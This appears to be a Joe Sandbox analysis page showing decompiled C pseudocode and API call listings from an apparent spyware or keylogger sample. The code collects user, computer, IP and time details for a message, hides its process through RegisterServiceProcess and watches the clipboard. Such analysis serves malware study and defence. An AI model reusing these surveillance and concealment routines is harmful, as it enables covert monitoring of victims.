C-Code - Quality: 63%

			E00426677() {
				void* __ebx;
				void* __esi;
				int _t154;
				void* _t158;
				void* _t160;
				void* _t170;
				void* _t171;
				void* _t173;
				void* _t174;
				void* _t175;
				void* _t176;
				int _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;
				char _t192;
				intOrPtr* _t199;
				signed int _t235;
				signed int _t251;
				char _t269;
				long _t271;
				void* _t287;

				E0043E4E0(0x442bf6, _t287);
				_t271 =  *(_t287 + 8);
				_t153 = _t271 + 4;
				 *((intOrPtr*)(_t287 - 0x10)) = _t271 + 4;
				if( *((intOrPtr*)(_t271 + 4)) == 0) {
					L2:
					_t154 = 0;
				} else {
					_t283 = _t271 + 0xcc;
					if( *(_t271 + 0xcc) != 0) {
						L00412BAB(_t153, 0, _t287 - 0x60, _t269, _t283);
						_push(0);
						_push( *((intOrPtr*)(_t271 + 0x100)));
						 *(_t287 - 4) = 0;
						_push(_t271 + 0x9a);
						_t156 = _t271 + 0x68;
						_push(_t156);
						_push( *_t271);
						_push( *((intOrPtr*)(_t287 - 0x10)));
						L00412C8A(_t156, 0, _t287 - 0x60, _t269, _t283);
						if(_t156 != 0) {
							L00411E5A(_t156, 0, _t287 - 0x298, _t269, _t283);
							_push(_t283);
							 *(_t287 - 4) = 1;
							L0043DE26();
							_push(_t287 - 0x10);
							 *(_t287 - 4) = 2;
							_t158 = E00410E20(_t287 - 0x18);
							_push(0);
							_push(_t158);
							 *(_t287 - 4) = 3;
							L00412165(_t158, 0, _t287 - 0x298, _t269, _t283);
							 *(_t287 - 4) = 4;
							L0043DD36();
							 *(_t287 - 4) = 2;
							L0043DD36();
							 *(_t287 - 4) = 1;
							L0043DD36();
							_push(_t283);
							L0043DE26();
							_push(_t287 - 0x10);
							 *(_t287 - 4) = 5;
							_t160 = E00410E20(_t287 - 0x18);
							 *(_t287 - 4) = 6;
							E00410E56(_t287 - 0x294, _t160);
							 *(_t287 - 4) = 7;
							L0043DD36();
							 *(_t287 - 4) = 5;
							L0043DD36();
							 *(_t287 - 4) = 1;
							L0043DD36();
							_push(_t287 - 0x34);
							L0043E162();
							_push(_t287 - 0x44);
							L0043E4A4();
							 *(_t287 - 0xc8) = 0;
							GetTimeFormatA(0x400, 2, _t287 - 0x44, 0, _t287 - 0xc8, 0x32);
							 *(_t287 - 0x94) = 0;
							GetDateFormatA(0x400, 0, _t287 - 0x44, 0, _t287 - 0x94, 0x32);
							_t170 = _t287 - 0xc8;
							_push(_t170);
							L0043DE26();
							_t171 = _t287 - 0x94;
							_push(_t171);
							 *(_t287 - 4) = 8;
							L0043DE26();
							 *(_t287 - 4) = 9;
							_t173 = E00429029(_t287 - 0x1c, 0xe052);
							_push(_t171);
							_push(_t173);
							_t174 = _t287 - 0x2c;
							 *(_t287 - 4) = 0xa;
							_push(_t174);
							L0043E282();
							_push(", ");
							_push(_t174);
							_t175 = _t287 - 0x20;
							 *(_t287 - 4) = 0xb;
							_push(_t175);
							L0043DE20();
							_push(_t170);
							_push(_t175);
							_t176 = _t287 - 0x10;
							 *(_t287 - 4) = 0xc;
							_push(_t176);
							L0043E282();
							_push(_t176);
							 *(_t287 - 4) = 0xd;
							L0043DFCA();
							 *(_t287 - 4) = 0xc;
							L0043DD36();
							 *(_t287 - 4) = 0xb;
							L0043DD36();
							 *(_t287 - 4) = 0xa;
							L0043DD36();
							 *(_t287 - 4) = 9;
							L0043DD36();
							 *(_t287 - 4) = 8;
							L0043DD36();
							 *(_t287 - 4) = 1;
							L0043DD36();
							_t269 =  *0x4550cc; // 0x0
							_t235 = 0x1f;
							 *(_t287 - 0x1c8) = _t269;
							memset(_t287 - 0x1c7, 0, _t235 << 2);
							asm("stosw");
							asm("stosb");
							_push(0x1f);
							 *(_t287 - 0x148) = _t269;
							memset(_t287 - 0x147, 0, 0 << 2);
							asm("stosw");
							asm("stosb");
							 *(_t287 + 8) = 0x80;
							GetUserNameA(_t287 - 0x1c8, _t287 + 8);
							 *(_t287 + 8) = 0x80;
							_t186 = GetComputerNameA(_t287 - 0x148, _t287 + 8);
							_push(1);
							_push(0x29);
							L0043E34E();
							_t283 = _t186;
							_push(1);
							_push(0x5c);
							 *(_t287 - 4) = 0xe;
							L0043E34E();
							_t187 = _t287 - 0x148;
							_push(_t187);
							 *(_t287 - 4) = 0xf;
							L0043DE26();
							_push(_t187);
							_t188 = _t287 - 0x2c;
							_push(0x453480);
							_push(_t188);
							 *(_t287 - 4) = 0x10;
							L0043E168();
							_push(_t186);
							_push(_t188);
							_t189 = _t287 - 0x1c;
							 *(_t287 - 4) = 0x11;
							_push(_t189);
							L0043E282();
							 *(_t287 - 4) = 0x12;
							_push(_t287 - 0x1c8);
							_push(_t189);
							_t190 = _t287 - 0x28;
							_push(_t190);
							L0043DE20();
							_push(_t186);
							_push(_t190);
							_t191 = _t287 - 0x30;
							 *(_t287 - 4) = 0x13;
							_push(_t191);
							L0043E282();
							_push(_t191);
							 *(_t287 - 4) = 0x14;
							L0043DE1A();
							 *(_t287 - 4) = 0x13;
							L0043DD36();
							 *(_t287 - 4) = 0x12;
							L0043DD36();
							 *(_t287 - 4) = 0x11;
							L0043DD36();
							 *(_t287 - 4) = 0x10;
							L0043DD36();
							 *(_t287 - 4) = 0xf;
							L0043DD36();
							 *(_t287 - 4) = 0xe;
							L0043DD36();
							 *(_t287 - 4) = 1;
							L0043DD36();
							_t192 =  *0x4550cc; // 0x0
							 *((char*)(_t287 - 0x318)) = _t192;
							_t251 = 0x1f;
							memset(_t287 - 0x317, 0, _t251 << 2);
							asm("stosw");
							asm("stosb");
							E0042A943(_t287 - 0x318);
							E00410EF3(_t287 - 0x378);
							 *(_t287 - 4) = 0x15;
							L0043DDD8();
							 *(_t287 - 4) = 0x16;
							_t199 = E00429029(_t287 - 0x14, 0xe053);
							_push(_t287 - 0xc8);
							_push(_t287 - 0x94);
							_push(_t287 - 0x1c8);
							_push(_t287 - 0x318);
							_push(_t287 - 0x148);
							_push( *_t199);
							 *(_t287 - 4) = 0x17;
							_push(_t287 - 0x24);
							L0043E174();
							 *(_t287 - 4) = 0x16;
							L0043DD36();
							_push(_t287 - 0x24);
							L004128F9(_t287 - 0x24, 0, _t287 - 0x298, _t269, _t186);
							_t156 = _t287 - 0x298;
							_push(_t287 - 0x298);
							L00412FF7(_t287 - 0x298, 0, _t287 - 0x60, _t269, _t186);
							 *(_t287 - 4) = 0x15;
							L0043DD36();
							 *(_t287 - 4) = 1;
							L004110CC(_t287 - 0x298, 0, _t287 - 0x378, _t269, _t283);
							 *(_t287 - 4) = 0;
							L00411F64(_t156, 0, _t287 - 0x298, _t269, _t283);
							_push(1);
							_pop(0);
						}
						 *(_t287 - 4) =  *(_t287 - 4) | 0xffffffff;
						L00412C30(_t156, 0, _t287 - 0x60, _t269, _t283);
						_t154 = 0;
					} else {
						goto L2;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t287 - 0xc));
				return _t154;
			}

0x0042667c
0x0042668a
0x00426692
0x00426695
0x00426698
0x004266a8
0x004266a8
0x0042669a
0x004266a0
0x004266a6
0x004266b2
0x004266b7
0x004266be
0x004266c7
0x004266ca
0x004266cb
0x004266ce
0x004266cf
0x004266d1
0x004266d4
0x004266db
0x004266e7
0x004266ec
0x004266f0
0x004266f4
0x004266ff
0x00426700
0x00426704
0x00426709
0x0042670a
0x00426711
0x00426715
0x0042671d
0x00426721
0x00426729
0x0042672d
0x00426735
0x00426739
0x0042673e
0x00426742
0x0042674d
0x0042674e
0x00426752
0x0042675e
0x00426762
0x0042676a
0x0042676e
0x00426776
0x0042677a
0x00426782
0x00426786
0x0042678e
0x0042678f
0x0042679a
0x0042679b
0x004267b6
0x004267bc
0x004267d2
0x004267d8
0x004267de
0x004267e7
0x004267e8
0x004267ef
0x004267f8
0x004267f9
0x004267fd
0x0042680d
0x00426811
0x00426818
0x00426819
0x0042681a
0x0042681d
0x00426821
0x00426822
0x00426827
0x0042682c
0x0042682d
0x00426830
0x00426834
0x00426835
0x0042683a
0x0042683b
0x0042683c
0x0042683f
0x00426843
0x00426844
0x00426849
0x00426850
0x00426854
0x0042685c
0x00426860
0x00426868
0x0042686c
0x00426874
0x00426878
0x00426880
0x00426884
0x0042688c
0x00426890
0x00426898
0x0042689c
0x004268a1
0x004268a9
0x004268b2
0x004268b8
0x004268ba
0x004268bc
0x004268bd
0x004268c8
0x004268ce
0x004268d0
0x004268d2
0x004268e3
0x004268e6
0x004268ef
0x004268fa
0x00426900
0x00426902
0x00426907
0x0042690c
0x0042690e
0x00426910
0x00426915
0x00426919
0x00426920
0x00426929
0x0042692a
0x0042692e
0x00426933
0x00426934
0x00426937
0x0042693c
0x0042693d
0x00426941
0x00426946
0x00426947
0x00426948
0x0042694b
0x0042694f
0x00426950
0x0042695b
0x0042695f
0x00426960
0x00426961
0x00426964
0x00426965
0x0042696a
0x0042696b
0x0042696c
0x0042696f
0x00426973
0x00426974
0x00426979
0x00426980
0x00426984
0x0042698c
0x00426990
0x00426998
0x0042699c
0x004269a4
0x004269a8
0x004269b0
0x004269b4
0x004269bc
0x004269c0
0x004269c5
0x004269cc
0x004269d4
0x004269d8
0x004269dd
0x004269e4
0x004269ea
0x004269f3
0x004269f5
0x004269f7
0x004269ff
0x00426a0b
0x00426a13
0x00426a17
0x00426a25
0x00426a29
0x00426a38
0x00426a3f
0x00426a46
0x00426a4d
0x00426a54
0x00426a55
0x00426a59
0x00426a5d
0x00426a5e
0x00426a69
0x00426a6d
0x00426a7b
0x00426a7c
0x00426a81
0x00426a8a
0x00426a8b
0x00426a93
0x00426a97
0x00426aa2
0x00426aa6
0x00426ab1
0x00426ab4
0x00426ab9
0x00426abb
0x00426abb
0x00426abc
0x00426ac3
0x00426ac8
0x00000000
0x00000000
0x00000000
0x004266a6
0x00426ad0
0x00426ad8

APIs

__EH_prolog.LIBCMT ref: 0042667C
#537.MFC42(?), ref: 004266F4
#800.MFC42 ref: 00426721
#800.MFC42 ref: 0042672D
#800.MFC42 ref: 00426739
#537.MFC42(?), ref: 00426742
#800.MFC42(00000000,?), ref: 0042676E
#800.MFC42(00000000,?), ref: 0042677A
#800.MFC42(00000000,?), ref: 00426786
#3811.MFC42(?,00000000,?), ref: 0042678F
#6673.MFC42(?,?,00000000,?), ref: 0042679B
GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032,?,?,00000000,?), ref: 004267BC
GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004267D8
#537.MFC42(?), ref: 004267E8
#537.MFC42(?,?), ref: 004267FD

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#922.MFC42(?,00000000,00000000,?,?), ref: 00426822
#924.MFC42(?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426835
#922.MFC42(?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426844
#858.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426854
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426860
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 0042686C
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426878
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426884
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 00426890
#800.MFC42(00000000,?,00000000,00000000,?,00000000,00454BAC,?,00000000,00000000,?,?), ref: 0042689C
GetUserNameA.ADVAPI32(?,?), ref: 004268E6
GetComputerNameA.KERNEL32 ref: 004268FA
#536.MFC42(00000029,00000001), ref: 00426907
#536.MFC42(0000005C,00000001,00000029,00000001), ref: 00426919
#537.MFC42(?,0000005C,00000001,00000029,00000001), ref: 0042692E
#926.MFC42(?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00426941
#922.MFC42(?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00426950
#924.MFC42(?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001,00000029,00000001), ref: 00426965
#922.MFC42(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001,00000029), ref: 00426974
#939.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 00426984
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 00426990
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 0042699C
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 004269A8
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 004269B4
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 004269C0
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 004269CC
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 004269D8

Part of subcall function 0042A943: WSAStartup.WSOCK32(00000101,?), ref: 0042A95B
Part of subcall function 0042A943: gethostname.WSOCK32(?,00000064,00000101,?), ref: 0042A96C
Part of subcall function 0042A943: lstrcmpA.KERNEL32(?,004550CC,?,00000064,00000101,?), ref: 0042A982
Part of subcall function 0042A943: gethostbyname.WSOCK32(?), ref: 0042A994
Part of subcall function 0042A943: htonl.WSOCK32(?,?), ref: 0042A9DB
Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042A9F0
Part of subcall function 0042A943: lstrcatA.KERNEL32(?,?), ref: 0042A9FC
Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA0E
Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA17
Part of subcall function 0042A943: strcat.MSVCRT(?,?), ref: 0042AA20
Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA35
Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA3E
Part of subcall function 0042A943: strcat.MSVCRT(?,?), ref: 0042AA47
Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA57
Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA60

Part of subcall function 00410EF3: __EH_prolog.LIBCMT ref: 00410EF8
Part of subcall function 00410EF3: #540.MFC42 ref: 00410F0B
Part of subcall function 00410EF3: #540.MFC42 ref: 00410F18
Part of subcall function 00410EF3: #537.MFC42(text/plain), ref: 00410F29
Part of subcall function 00410EF3: #537.MFC42(iso-8859-1,text/plain), ref: 00410F3A
Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F46
Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F52
Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F5E
Part of subcall function 00410EF3: #540.MFC42(iso-8859-1,text/plain), ref: 00410F6A
Part of subcall function 00410EF3: #540.MFC42 ref: 00410F9A
Part of subcall function 00410EF3: UuidCreate.RPCRT4 ref: 00410FB4
Part of subcall function 00410EF3: UuidToStringA.RPCRT4(?,?), ref: 00410FC5
Part of subcall function 00410EF3: #860.MFC42(?,?,?,?,?,?,?,?), ref: 00410FD0
Part of subcall function 00410EF3: RpcStringFreeA.RPCRT4(?), ref: 00410FD9

#540.MFC42(00000000,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00453480,00000000,?,0000005C,00000001), ref: 00426A17
#2818.MFC42(?,?,?,?,?,?,?,00000000,?,00000000,00000000,?,00000000,?,?,00000000), ref: 00426A5E
#800.MFC42(0000005C,00000001,00000029,00000001), ref: 00426A6D
#800.MFC42 ref: 00426A97

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#540$#922_itoalstrcat$String$#536#924FormatH_prologNameUuidstrcat$#1168#2818#3811#6673#858#860#926#939ComputerCreateDateFreeLoadStartupTimeUsergethostbynamegethostnamehtonllstrcmp
String ID:
API String ID: 448821295-0
Opcode ID: 8dd36f2ec083411aaf2abe1a7b1e0ae4fd0d73d5863e33e903578102bd5ab31e
Instruction ID: db790c9d9ea3b46c3d35e6496e7aaa1a22b378c067be7cf2d95ce2ca2c080a6b
Opcode Fuzzy Hash: 8dd36f2ec083411aaf2abe1a7b1e0ae4fd0d73d5863e33e903578102bd5ab31e
Instruction Fuzzy Hash: 59D1BC71C0128DEEDB51EBA5C945BDEBBB8AF29308F10419EE105B3182DB785B48CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00420D64, Relevance: 59.8, APIs: 28, Strings: 6, Instructions: 331
timewindowlibraryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00420D64(int __ecx, void* __edx) {
				void* __esi;
				char* _t106;
				void* _t107;
				int _t109;
				int _t113;
				int _t114;
				int _t115;
				int _t124;
				int _t125;
				struct HWND__* _t126;
				int _t128;
				int _t129;
				struct HWND__* _t133;
				intOrPtr* _t140;
				intOrPtr _t141;
				int _t147;
				int _t164;
				intOrPtr* _t170;
				struct HWND__* _t197;
				void* _t216;
				int _t218;
				char* _t220;
				intOrPtr _t223;
				int _t225;
				void* _t227;
				void* _t229;
				intOrPtr _t230;
				void* _t232;

				_t216 = __edx;
				E0043E4E0(0x4420d2, _t227);
				_t230 = _t229 - 0x284;
				_t225 = __ecx;
				L0043DF94();
				_t106 = __ecx + 0x17fe;
				_t233 =  *_t106;
				if( *_t106 != 0) {
					 *_t106 = 0;
					_t170 = _t227 - 0x10;
					_push(_t170);
					L0043E162();
					_push("pk.bin");
					 *((intOrPtr*)(__ecx + 0x1a0c)) =  *_t170;
					_push(0x4558c8);
					_push(_t227 - 0x14);
					L0043DE20();
					 *(_t227 - 4) = 0;
					E0040BC5C(__ecx + 0x16b8, _t233,  *((intOrPtr*)(_t227 - 0x14)));
					 *(_t227 - 4) =  *(_t227 - 4) | 0xffffffff;
					L0043DD36();
				}
				_t107 = E004279C9(_t225, _t216);
				_t235 = _t107;
				if(_t107 == 0) {
					__eflags =  *(_t225 + 0x2728);
					_t218 = 2;
					if( *(_t225 + 0x2728) != 0) {
						L10:
						__eflags =  *(_t225 + 0x17f7);
						if( *(_t225 + 0x17f7) != 0) {
							_push(0);
							E0040B873(_t227 - 0xd0);
							 *(_t227 - 4) = _t218;
							 *((intOrPtr*)(_t227 - 0x70)) = _t225 + 0x16b8;
							L0043DE7A();
							 *(_t227 - 4) = 3;
							L00404F36(_t225 + 0x16b8, _t227 - 0x6c, _t225);
							_t33 = _t227 - 4;
							 *_t33 =  *(_t227 - 4) | 0xffffffff;
							__eflags =  *_t33;
							L0043E04E();
						}
						_push("PKL Window");
						L0043E15C();
						_push(0);
						E00422006(_t225);
						__eflags =  *(_t225 + 0x17cc);
						if( *(_t225 + 0x17cc) == 0) {
							L15:
							_t109 = E00425403(_t225);
							__eflags = _t109;
							_push(0);
							if(_t109 != 0) {
								E004221C8(_t109, _t225);
								 *((char*)(_t225 + 0x3e4)) = 1;
								goto L19;
							}
							goto L16;
						} else {
							__eflags =  *(_t225 + 0x17e4);
							if(__eflags == 0) {
								goto L15;
							}
							 *((char*)(_t225 + 0x3e4)) = 0;
							L19:
							_push(1);
							E00421274(_t225, __eflags);
							__eflags =  *(_t225 + 0x17dc);
							if(__eflags == 0) {
								E00428249();
							} else {
								E0042817C(_t225, __eflags, 0x4550cc,  *((intOrPtr*)(_t225 + 0x1a14)));
							}
							_t113 =  *(_t225 + 0x2758);
							__eflags = _t113;
							if(_t113 != 0) {
								 *_t113(1);
							}
							_t114 =  *(_t225 + 0x275c);
							__eflags = _t114;
							if(_t114 != 0) {
								 *_t114( *(_t225 + 0x17de) & 0x000000ff);
							}
							_t115 =  *(_t225 + 0x2760);
							__eflags = _t115;
							if(_t115 != 0) {
								 *_t115( *(_t225 + 0x17ef) & 0x000000ff);
							}
							SetTimer( *(_t225 + 0x20), _t218, 0x12c, 0);
							SetTimer( *(_t225 + 0x20), 0x10, 0x2bf20, 0);
							SetTimer( *(_t225 + 0x20), 0x12, 0x3a98, 0);
							E0042663D(_t225);
							E00420784(E00420787(_t225 + 0x78,  *(_t225 + 0x17df) & 0x000000ff), 0);
							E004034A9(_t225 + 0x78,  *((intOrPtr*)(_t225 + 0x1d34)));
							 *((intOrPtr*)(_t225 + 0x80)) = 0;
							_t124 = GetProcAddress(GetModuleHandleA("KERNEL32.DLL"), "RegisterServiceProcess");
							__eflags = _t124;
							 *0x455aa4 = _t124;
							if(_t124 != 0) {
								 *0x455aa4(GetCurrentProcessId(),  *(_t225 + 0x17e1) & 0x000000ff);
							}
							_t125 =  *(_t225 + 0x2768);
							__eflags = _t125;
							if(_t125 != 0) {
								 *_t125( *(_t225 + 0x17e1) & 0x000000ff);
							}
							__eflags =  *(_t225 + 0x17c9);
							if( *(_t225 + 0x17c9) != 0) {
								SetTimer( *(_t225 + 0x20), 0xe, 0xea60, 0);
							}
							__eflags =  *(_t225 + 0x1a18);
							if( *(_t225 + 0x1a18) != 0) {
								SetTimer( *(_t225 + 0x20), 0x11, 0xea60, 0);
							}
							__eflags =  *(_t225 + 0x17e5);
							if( *(_t225 + 0x17e5) != 0) {
								_t147 = ( *(_t225 + 0x1d3c) * 0x3c +  *((intOrPtr*)(_t225 + 0x1d40))) * 0x3e8;
								__eflags = _t147;
								SetTimer( *(_t225 + 0x20), 0xf, _t147, 0);
							}
							__eflags =  *(_t225 + 0x1d38);
							if( *(_t225 + 0x1d38) != 0) {
								 *((intOrPtr*)(_t225 + 0x2738)) = SetClipboardViewer( *(_t225 + 0x20));
							}
							__eflags = _t225;
							if(_t225 != 0) {
								_t126 =  *(_t225 + 0x20);
							} else {
								_t126 = 0;
							}
							_push(1);
							E00428C14(_t126);
							__eflags =  *(_t225 + 0x17dd);
							if(__eflags != 0) {
								_t223 =  *((intOrPtr*)(E00429029(_t227 - 0x10, 0xe02b)));
								 *(_t227 - 4) = 4;
								_t140 = E00429029(_t227 - 0x14, 0xe02c);
								_t232 = _t230 + 0x10;
								_t141 =  *_t140;
								__eflags = _t225;
								 *(_t227 - 4) = 5;
								if(_t225 != 0) {
									_t197 =  *(_t225 + 0x20);
								} else {
									_t197 = 0;
								}
								E00428EEB(_t197, 0, _t141, _t223, 1);
								_t230 = _t232 + 0x14;
								 *(_t227 - 4) = 4;
								L0043DD36();
								_t80 = _t227 - 4;
								 *_t80 =  *(_t227 - 4) | 0xffffffff;
								__eflags =  *_t80;
								L0043DD36();
							}
							_t128 = E00426D6B(__eflags, 1);
							__eflags =  *(_t225 + 0x17dc);
							if( *(_t225 + 0x17dc) != 0) {
								__eflags =  *(_t225 + 0x17e8);
								if( *(_t225 + 0x17e8) != 0) {
									_t128 = E00428249();
								}
							}
							__eflags =  *(_t225 + 0x17ee);
							_t220 = _t225 + 0x17ee;
							if( *(_t225 + 0x17ee) != 0) {
								_t128 = E00426AD9(_t225);
							}
							__eflags =  *(_t225 + 0x17fc);
							if( *(_t225 + 0x17fc) != 0) {
								_t128 = E004279A4(_t225);
							}
							 *_t220 = 0;
							L0043DD54();
							_t191 = 0x60;
							 *(_t227 - 0x10) = _t128;
							__eflags = _t128;
							 *(_t227 - 4) = 6;
							if(_t128 == 0) {
								_t129 = 0;
								__eflags = 0;
							} else {
								_push(_t225);
								_push(_t191);
								 *((intOrPtr*)(_t227 - 0x18)) = _t230;
								_push("bpkch.dat");
								_push(0x4558c4);
								_push(_t230);
								L0043DE20();
								_t191 =  *(_t227 - 0x10);
								_t129 = E0040EF63( *(_t227 - 0x10));
							}
							 *(_t227 - 4) =  *(_t227 - 4) | 0xffffffff;
							__eflags =  *(_t225 + 0x17f9);
							 *(_t225 + 0x60) = _t129;
							if( *(_t225 + 0x17f9) != 0) {
								_t191 = _t129;
								E0040F0EB(_t129);
							}
							_push("web.dat");
							_push(0x4558c4);
							_push(_t227 - 0x18);
							L0043DE20();
							 *(_t227 - 4) = 7;
							L004144D9(L00414496(_t191),  *((intOrPtr*)(_t227 - 0x18)));
							_t98 = _t227 - 4;
							 *_t98 =  *(_t227 - 4) | 0xffffffff;
							__eflags =  *_t98;
							L0043DD36();
							_t133 = GetDlgItem( *(_t225 + 0x20), 0x42d);
							_push(1);
							 *(_t225 + 0x272c) = _t133;
							_pop(0);
							goto L61;
						}
					}
					_push(0);
					L0042C15F(_t227 - 0x290);
					 *(_t227 - 4) = 1;
					_t164 = E0041AFE1();
					 *(_t225 + 0x273c) = _t164;
					 *(_t227 - 0x22c) = _t164;
					L0043DE7A();
					__eflags = _t164 - _t218;
					if(_t164 != _t218) {
						_t22 = _t227 - 4;
						 *_t22 =  *(_t227 - 4) | 0xffffffff;
						__eflags =  *_t22;
						E004211EB(_t227 - 0x290);
						goto L10;
					}
					__eflags =  *(_t227 - 0x22c);
					if( *(_t227 - 0x22c) == 0) {
						 *(_t225 + 0x17dc) = 0;
						E00428249();
					}
					PostMessageA( *(_t225 + 0x20), 0x111, 0xdf, 0);
					 *(_t227 - 4) =  *(_t227 - 4) | 0xffffffff;
					E004211EB(_t227 - 0x290);
					goto L17;
				} else {
					E00427AD1(_t235);
					_push(0);
					L16:
					PostMessageA( *(_t225 + 0x20), 0x111, 0xdf, ??);
					L17:
					L61:
					 *[fs:0x0] =  *((intOrPtr*)(_t227 - 0xc));
					return 0;
				}
			}

0x00420d64
0x00420d69
0x00420d6e
0x00420d77
0x00420d79
0x00420d7e
0x00420d86
0x00420d88
0x00420d8a
0x00420d8c
0x00420d8f
0x00420d90
0x00420d97
0x00420d9c
0x00420da5
0x00420daa
0x00420dab
0x00420db8
0x00420dbb
0x00420dc0
0x00420dc7
0x00420dc7
0x00420dce
0x00420dd3
0x00420dd5
0x00420de4
0x00420dec
0x00420ded
0x00420e6c
0x00420e6c
0x00420e72
0x00420e74
0x00420e7b
0x00420e8c
0x00420e8f
0x00420e92
0x00420e9a
0x00420ea1
0x00420ea6
0x00420ea6
0x00420ea6
0x00420eb0
0x00420eb0
0x00420eb5
0x00420ebc
0x00420ec1
0x00420ec4
0x00420ec9
0x00420ecf
0x00420ee1
0x00420ee3
0x00420ee8
0x00420eea
0x00420eeb
0x00420f09
0x00420f0e
0x00000000
0x00420f0e
0x00000000
0x00420ed1
0x00420ed1
0x00420ed7
0x00000000
0x00000000
0x00420ed9
0x00420f15
0x00420f15
0x00420f19
0x00420f1e
0x00420f24
0x00420f3a
0x00420f26
0x00420f31
0x00420f37
0x00420f3f
0x00420f45
0x00420f47
0x00420f4b
0x00420f4b
0x00420f4d
0x00420f53
0x00420f55
0x00420f5f
0x00420f5f
0x00420f61
0x00420f67
0x00420f69
0x00420f73
0x00420f73
0x00420f85
0x00420f92
0x00420f9f
0x00420fa3
0x00420fbc
0x00420fca
0x00420fd4
0x00420fe6
0x00420fec
0x00420fee
0x00420ff3
0x00421004
0x00421004
0x0042100a
0x00421010
0x00421012
0x0042101c
0x0042101c
0x0042101e
0x00421024
0x00421031
0x00421031
0x00421033
0x00421039
0x00421046
0x00421046
0x00421048
0x0042104e
0x00421060
0x00421060
0x0042106c
0x0042106c
0x0042106e
0x00421074
0x0042107f
0x0042107f
0x00421085
0x00421087
0x0042108d
0x00421089
0x00421089
0x00421089
0x00421090
0x00421093
0x00421098
0x004210a0
0x004210b0
0x004210bb
0x004210c2
0x004210c7
0x004210ca
0x004210cc
0x004210ce
0x004210d2
0x004210d8
0x004210d4
0x004210d4
0x004210d4
0x004210e1
0x004210e6
0x004210ec
0x004210f0
